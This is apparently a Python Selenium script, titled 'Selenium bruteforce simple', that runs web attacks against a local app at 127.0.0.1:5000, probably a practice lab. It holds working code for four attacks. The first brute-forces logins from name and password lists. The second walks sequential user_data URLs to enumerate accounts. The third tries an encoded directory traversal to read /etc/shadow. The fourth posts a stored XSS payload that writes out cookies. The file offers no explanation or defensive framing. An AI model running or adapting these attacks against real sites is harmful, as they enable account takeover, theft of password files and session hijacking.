Selenium bruteforce simple

1. #!/usr/bin/python3
2. from selenium import webdriver
3. from selenium.webdriver.common.keys import Keys
4. from pyvirtualdisplay import Display
5. import re
6. import requests
7.  
8. def guess_password(driver):
9.    
10.     with open("names.txt", "r") as f:
11.             names = f.read()
12.  
13.     print(names)
14.     names = names.split("\n")
15.     print(names)
16.  
17.     usernames = []
18.  
19.     for name in names:
20.         usernames.append(name.replace(" ", "."))
21.  
22.     with open("dictionary.txt") as f:
23.         passwords = f.read()
24.  
25.     passwords = passwords.split("\n")
26.     print(passwords)
27.  
28.     for user in usernames:
29.         for password in passwords:
30.  
31.             print("Trying Username: {} with Password: {}".format(user, password))
32.  
33.             elem = driver.find_element_by_name("username")
34.             elem.send_keys(user)
35.  
36.             elem = driver.find_element_by_name("password")
37.             elem.send_keys(password)
38.  
39.             elem.send_keys(Keys.RETURN)
40.  
41.             src = driver.page_source
42.  
43.             login_err_found = re.search(r'Wrong username', src)
44.             if login_err_found is None:
45.                 print("Found the password!  Username: {} with Password: {}".format(user, password))
46.                 return src
47.  
48.     return "Not found"
49.  
50.  
51. def brute_force_login(driver):
52.  
53.     driver.get("http://127.0.0.1:5000/")
54.  
55.     page_text = guess_password(driver)
56.  
57.     print(page_text)
58.  
59.  
60. def sess_pred(driver):
61.  
62.     run = True
63.     base = "http://127.0.0.1:5000/"
64.  
65.     counter = 0
66.  
67.     while run is True:
68.         counter += 1
69.         url = base + "user_data/user" + str(counter)
70.         print("\n Trying {}".format(url))
71.         driver.get(url)
72.         r = requests.get(url)
73.         print(r.status_code)
74.         if r.status_code != 200:
75.             run = False
76.         else:
77.             print(r.text)
78.  
79.  
80. def directory_transversal(driver):
81.  
82.     url = "http://127.0.0.1:5000/get_file/..%2fetc/shadow"
83.     driver.get(url)
84.     r = requests.get(url)
85.     print(r.text)
86.  
87.  
88. def xss_attack(driver):
89.     driver.get("http://127.0.0.1:5000/blog")
90.     elem = driver.find_element_by_name("post")
91.     elem.send_keys("<script>document.write(document.cookie);</script>")
92.     elem.send_keys(Keys.RETURN)
93.  
94.     print(driver.page_source)
95.  
96.  
97.  
98. if __name__ == '__main__':
99.    
100.     display = Display(visible=0, size=(1024, 768))
101.     display.start()
102.  
103.     driver = webdriver.Firefox()
104.  
105.     ## Uncomment one of the functions below to run a specific hack
106.  
107.     #brute_force_login(driver)
108.     #sess_pred(driver)
109.     #directory_transversal(driver)
110.     #xss_attack(driver)
111.  
112.     driver.close()
113.     display.stop()